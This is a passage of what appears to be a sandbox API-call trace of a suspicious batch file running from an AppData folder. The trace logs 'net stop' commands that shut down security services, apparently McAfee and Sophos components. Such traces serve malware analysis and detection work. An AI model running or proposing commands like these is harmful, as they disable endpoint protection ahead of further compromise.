lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0041.769] GetProcessHeap () returned 0x3e0000 [0041.769] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0041.769] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0041.769] GetProcessHeap () returned 0x3e0000 [0041.769] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0041.769] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0041.769] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0041.769] GetLastError () returned 0x2 [0041.769] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0041.769] GetLastError () returned 0x2 [0041.769] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0041.769] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0041.769] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0041.770] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0041.770] GetLastError () returned 0x2 [0041.770] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0041.770] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0041.770] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0041.770] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0041.770] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0041.770] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0041.770] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0041.770] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop FA_Scheduler /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop FA_Scheduler /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop FA_Scheduler /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x590, dwThreadId=0x2ac)) returned 1 [0041.774] CloseHandle (hObject=0x74) returned 1 [0041.774] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0041.774] GetProcessHeap () returned 0x3e0000 [0041.774] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0041.774] GetEnvironmentStringsW () returned 0x3f8408* [0041.774] GetProcessHeap () returned 0x3e0000 [0041.774] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0041.774] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0041.774] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0042.067] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0042.067] CloseHandle (hObject=0x78) returned 1 [0042.067] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0042.067] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0042.067] GetProcessHeap () returned 0x3e0000 [0042.067] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0042.067] GetEnvironmentStringsW () returned 0x3f8408* [0042.068] GetProcessHeap () returned 0x3e0000 [0042.068] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0042.068] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0042.068] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0042.068] GetProcessHeap () returned 0x3e0000 [0042.068] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0042.068] GetEnvironmentStringsW () returned 0x3f8408* [0042.068] GetProcessHeap () returned 0x3e0000 [0042.068] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0042.068] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0042.068] GetProcessHeap () returned 0x3e0000 [0042.068] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0042.068] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0042.068] _get_osfhandle (_FileHandle=1) returned 0x264 [0042.068] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0042.068] _get_osfhandle (_FileHandle=1) returned 0x264 [0042.068] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0042.068] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0042.068] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0042.069] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0042.069] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0042.069] SetConsoleInputExeNameW () returned 0x1 [0042.069] GetConsoleOutputCP () returned 0x1b5 [0042.069] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0042.069] SetThreadUILanguage (LangId=0x0) returned 0x409 [0042.069] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0042.069] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0042.069] _get_osfhandle (_FileHandle=3) returned 0x78 [0042.069] SetFilePointer (in: hFile=0x78, lDistanceToMove=1632, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x660 [0042.069] GetProcessHeap () returned 0x3e0000 [0042.069] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0042.070] GetProcessHeap () returned 0x3e0000 [0042.070] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0042.070] GetProcessHeap () returned 0x3e0000 [0042.070] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0042.070] GetProcessHeap () returned 0x3e0000 [0042.070] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0042.070] GetProcessHeap () returned 0x3e0000 [0042.070] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0042.070] GetProcessHeap () returned 0x3e0000 [0042.070] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0042.070] GetProcessHeap () returned 0x3e0000 [0042.070] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0042.070] GetProcessHeap () returned 0x3e0000 [0042.070] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0042.070] GetProcessHeap () returned 0x3e0000 [0042.070] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0042.070] GetProcessHeap () returned 0x3e0000 [0042.070] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0042.070] GetProcessHeap () returned 0x3e0000 [0042.070] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0042.070] GetProcessHeap () returned 0x3e0000 [0042.070] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0042.070] GetProcessHeap () returned 0x3e0000 [0042.070] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0042.070] _get_osfhandle (_FileHandle=3) returned 0x78 [0042.070] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x660 [0042.070] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1261, lpOverlapped=0x0) returned 1 [0042.070] SetFilePointer (in: hFile=0x78, lDistanceToMove=1661, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x67d [0042.070] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=29, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SAVAdminService /y\r\n /y\r\nryΓÇ¥ /y\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 29 [0042.070] _get_osfhandle (_FileHandle=3) returned 0x78 [0042.070] GetFileType (hFile=0x78) returned 0x1 [0042.071] _get_osfhandle (_FileHandle=3) returned 0x78 [0042.071] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x67d [0042.071] GetProcessHeap () returned 0x3e0000 [0042.071] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0042.071] GetProcessHeap () returned 0x3e0000 [0042.071] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0042.071] _tell (_FileHandle=3) returned 1661 [0042.071] _close (_FileHandle=3) returned 0 [0042.071] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0042.071] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0042.071] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0042.071] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0042.071] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0042.071] _wcsicmp (_String1="net", _String2="CD") returned 11 [0042.072] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0042.072] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0042.072] _wcsicmp (_String1="net", _String2="REN") returned -4 [0042.072] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0042.072] _wcsicmp (_String1="net", _String2="SET") returned -5 [0042.072] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0042.072] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0042.072] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0042.072] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0042.072] _wcsicmp (_String1="net", _String2="MD") returned 1 [0042.072] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0042.072] _wcsicmp (_String1="net", _String2="RD") returned -4 [0042.072] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0042.072] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0042.072] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0042.072] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0042.072] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0042.072] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0042.072] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0042.072] _wcsicmp (_String1="net", _String2="VER") returned -8 [0042.072] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0042.072] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0042.072] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0042.072] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0042.072] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0042.072] _wcsicmp (_String1="net", _String2="START") returned -5 [0042.072] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0042.072] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0042.072] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0042.072] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0042.072] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0042.072] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0042.072] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0042.072] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0042.073] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0042.073] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0042.073] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0042.073] SetErrorMode (uMode=0x0) returned 0x1 [0042.073] GetProcessHeap () returned 0x3e0000 [0042.073] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0042.073] GetProcessHeap () returned 0x3e0000 [0042.073] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0042.073] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0042.073] GetProcessHeap () returned 0x3e0000 [0042.073] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0042.073] GetProcessHeap () returned 0x3e0000 [0042.073] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0042.073] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0042.073] GetProcessHeap () returned 0x3e0000 [0042.073] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0042.073] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0042.073] GetProcessHeap () returned 0x3e0000 [0042.073] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0042.073] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0042.073] GetProcessHeap () returned 0x3e0000 [0042.073] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0042.073] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0042.073] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0042.074] GetLastError () returned 0x2 [0042.074] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0042.074] GetLastError () returned 0x2 [0042.074] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0042.074] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0042.074] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0042.074] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0042.074] GetLastError () returned 0x2 [0042.074] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0042.074] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0042.074] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0042.075] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0042.075] SetErrorMode (uMode=0x0) returned 0x1 [0042.075] GetProcessHeap () returned 0x3e0000 [0042.075] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0042.075] GetProcessHeap () returned 0x3e0000 [0042.075] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0042.075] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0042.075] GetProcessHeap () returned 0x3e0000 [0042.075] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0042.075] GetProcessHeap () returned 0x3e0000 [0042.075] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0042.075] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0042.075] GetProcessHeap () returned 0x3e0000 [0042.075] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0042.075] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0042.075] GetProcessHeap () returned 0x3e0000 [0042.075] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0042.075] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0042.075] GetProcessHeap () returned 0x3e0000 [0042.075] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0042.075] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0042.075] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0042.075] GetLastError () returned 0x2 [0042.075] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0042.076] GetLastError () returned 0x2 [0042.076] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0042.076] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0042.076] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0042.076] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0042.076] GetLastError () returned 0x2 [0042.076] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0042.076] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0042.076] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0042.076] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0042.076] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0042.077] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0042.077] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0042.077] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SAVAdminService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SAVAdminService /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SAVAdminService /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x178, dwThreadId=0x688)) returned 1 [0042.080] CloseHandle (hObject=0x78) returned 1 [0042.080] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0042.080] GetProcessHeap () returned 0x3e0000 [0042.081] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0042.081] GetEnvironmentStringsW () returned 0x3f8408* [0042.081] GetProcessHeap () returned 0x3e0000 [0042.081] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0042.081] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0042.081] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0042.396] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0042.403] CloseHandle (hObject=0x74) returned 1 [0042.403] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0042.403] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0042.403] GetProcessHeap () returned 0x3e0000 [0042.403] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0042.403] GetEnvironmentStringsW () returned 0x3f8408* [0042.404] GetProcessHeap () returned 0x3e0000 [0042.404] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0042.404] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0042.404] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0042.404] GetProcessHeap () returned 0x3e0000 [0042.404] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0042.404] GetEnvironmentStringsW () returned 0x3f8408* [0042.404] GetProcessHeap () returned 0x3e0000 [0042.404] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0042.404] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0042.404] GetProcessHeap () returned 0x3e0000 [0042.404] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0042.404] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0042.404] _get_osfhandle (_FileHandle=1) returned 0x264 [0042.404] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0042.404] _get_osfhandle (_FileHandle=1) returned 0x264 [0042.404] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0042.404] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0042.404] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0042.405] 